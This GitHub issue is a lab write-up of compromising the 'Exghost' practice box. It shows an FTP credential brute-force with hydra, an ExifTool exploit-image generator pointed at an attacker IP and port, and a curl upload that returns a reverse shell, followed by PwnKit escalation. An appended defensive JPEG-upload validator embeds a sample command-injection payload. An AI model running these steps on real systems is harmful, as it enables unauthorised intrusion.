Exghost (easy) #10

Open

WDavid404 opened this issue Jul 14, 2024 · 1 comment
Comments

WDavid404 commented Jul 14, 2024

Key points:

  • FTP brute-force
    hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183
  • [PE] PwnKit vulnerability (CVE-2021-4034) -- Python version of the exploit

Learned:

  • FFUF may get more info than feroxbuster
WDavid404 commented Jul 15, 2024

PORT   STATE  SERVICE  REASON         VERSION
21/tcp open   ftp      syn-ack ttl 61 vsftpd 3.0.3
80/tcp open   http     syn-ack ttl 61 Apache httpd 2.4.41
|_http-server-header: Apache/2.4.41 (Ubuntu)
| http-methods: 
|_  Supported Methods: POST OPTIONS HEAD GET
|_http-title: 403 Forbidden

FTP via anonymous --> failed

search vsftpd 3.0.3 exploit --> https://www.exploit-db.com/exploits/49719 (Remote Denial of Service)
search apache 2.4.41 exploit --> no useful info

feroxbuster -u http://192.168.243.183/ -k -C 404,503,502
--> /uploads (301)

ffuf -w /usr/share/dirbuster/wordlists/directory-list-lowercase-2.3-medium.txt -t 100 -u http://192.168.243.183/FUZZ
--> get more info:
/uploads
/exiftool
/server-status

Access /exiftool --> get version info: '12.23'
--->
https://www.exploit-db.com/exploits/50911
--> however, didn't find a way to use it

Try brute-force FTP:
hydra -C /usr/share/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt ftp://192.168.243.183

ftp login
ls command --> "229 Entering Extended Passive Mode"
resolve: input the "passive" command
"get backup" to download the backup file

Prepare an image:
python3 50911.py -s 192.168.45.192 4444
--> generates a jpg image file.

curl -X POST -F myFile=@/home/kali/pen-200/PGBox/image.jpg 192.168.243.183/exiftest.php -H 'Content-Type: multipart/form-data' -vv
--> get a reverse shell

linpeas.sh
--> CVE-2021-4034

There is a Python version instead of compiling C++:
https://github.com/joeammond/CVE-2021-4034.git

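The foothold above came from an upload handler (exiftest.php) that passed a user-supplied "image" straight to ExifTool 12.23, which EDB 50911 exploits (CVE-2021-22204: a DjVu file hidden in a JPEG EXIF tag drove code execution through ExifTool's DjVu metadata parser; fixed in ExifTool 12.24). The only real fix is patching ExifTool, but the example below shows the kind of defensive gate an upload endpoint should have in front of any metadata parser: walk the JPEG marker structure, cap metadata size, and refuse files carrying a DjVu container. This is an added example written for this note, not code from the issue or from the target box; the sample files are constructed inline (their DjVu chunk lengths are illustrative, not valid DjVu) and the size cap is an assumed policy value.

```python
"""Pre-parser gate for JPEG uploads: structure check plus DjVu smuggling check.

Added example, not from the issue or the box. The 64 KiB metadata cap is an
assumed policy value; the sample files at the bottom are constructed by hand.
"""

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
DJVU_MAGIC = b"AT&TFORM"              # IFF-style header that opens every DjVu file
DJVU_ANNOT_CHUNKS = (b"ANTa", b"ANTz")  # annotation chunks that carried the exploit payload


def parse_jpeg_segments(data: bytes) -> list[tuple[int, bytes]]:
    """Walk JPEG marker segments from SOI up to and including SOS.

    Returns (marker, payload) pairs; raises ValueError on structural defects
    (bad marker byte, length running past the buffer, no SOS before the end).
    """
    if not data.startswith(JPEG_SOI):
        raise ValueError("missing SOI marker")
    pos, segments = 2, []
    while pos + 4 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0x01 or 0xD0 <= marker <= 0xD8:  # TEM, RSTn, SOI: no length field
            pos += 2
            continue
        length = int.from_bytes(data[pos + 2:pos + 4], "big")
        if length < 2 or pos + 2 + length > len(data):
            raise ValueError("segment length out of bounds")
        segments.append((marker, data[pos + 4:pos + 2 + length]))
        pos += 2 + length
        if marker == 0xDA:  # SOS: entropy-coded scan follows, stop here
            return segments
    raise ValueError("no SOS segment before end of data")


def check_upload(data: bytes, max_metadata: int = 64 * 1024) -> tuple[bool, str]:
    """Return (accepted, reason) for a file a client claims is a JPEG."""
    # Strict framing: SOI at the start, EOI at the very end (trailers rejected).
    if not data.startswith(JPEG_SOI) or not data.endswith(JPEG_EOI):
        return False, "not a JPEG (bad SOI/EOI)"
    try:
        segments = parse_jpeg_segments(data)
    except ValueError as exc:
        return False, f"malformed JPEG: {exc}"
    # The 50911-style payload stores a whole DjVu file inside an EXIF tag, so the
    # DjVu magic shows up verbatim inside the JPEG. Scan the raw bytes, not just APP1.
    if DJVU_MAGIC in data:
        return False, "embedded DjVu container"
    # APPn (0xE0-0xEF) and COM (0xFE) hold metadata; a real photo needs little of it.
    meta = sum(len(p) for m, p in segments if 0xE0 <= m <= 0xEF or m == 0xFE)
    if meta > max_metadata:
        return False, f"metadata too large ({meta} bytes)"
    for marker, payload in segments:
        if 0xE0 <= marker <= 0xEF and any(c in payload for c in DJVU_ANNOT_CHUNKS):
            return False, "DjVu annotation chunk inside APPn segment"
    return True, "ok"


def build_jpeg(app1_payload: bytes = b"") -> bytes:
    """Constructed minimal JPEG: SOI, optional APP1, a one-byte SOS header, EOI."""
    body = JPEG_SOI
    if app1_payload:
        body += b"\xff\xe1" + (len(app1_payload) + 2).to_bytes(2, "big") + app1_payload
    sos = b"\x00"  # placeholder SOS content; the file is structurally valid, not decodable
    return body + b"\xff\xda" + (len(sos) + 2).to_bytes(2, "big") + sos + JPEG_EOI


# Constructed samples.
CLEAN_JPEG = build_jpeg(b"Exif\x00\x00MM\x00*\x00\x00\x00\x08")
DJVU_IN_EXIF = build_jpeg(
    b"Exif\x00\x00" + DJVU_MAGIC + b"\x00\x00\x00\x18DJVUANTa\x00\x00\x00\x10"
    + b'(metadata (Copyright "\\" . qx{id} . \\""))'  # perl-interpolation style payload
)
RAW_DJVU = DJVU_MAGIC + b"\x00\x00\x00\x04DJVU"
TRUNCATED = CLEAN_JPEG[:-1]
OVERSIZED_SEGMENT = JPEG_SOI + b"\xff\xe1\xff\xff" + b"abc" + JPEG_EOI

if __name__ == "__main__":
    for name in ("CLEAN_JPEG", "DJVU_IN_EXIF", "RAW_DJVU", "TRUNCATED", "OVERSIZED_SEGMENT"):
        print(f"{name:18} -> {check_upload(globals()[name])}")
```

Reject before any parser runs, and keep the check independent of the parser you are protecting; the byte-level DjVu magic scan catches the payload regardless of which EXIF tag it was stuffed into.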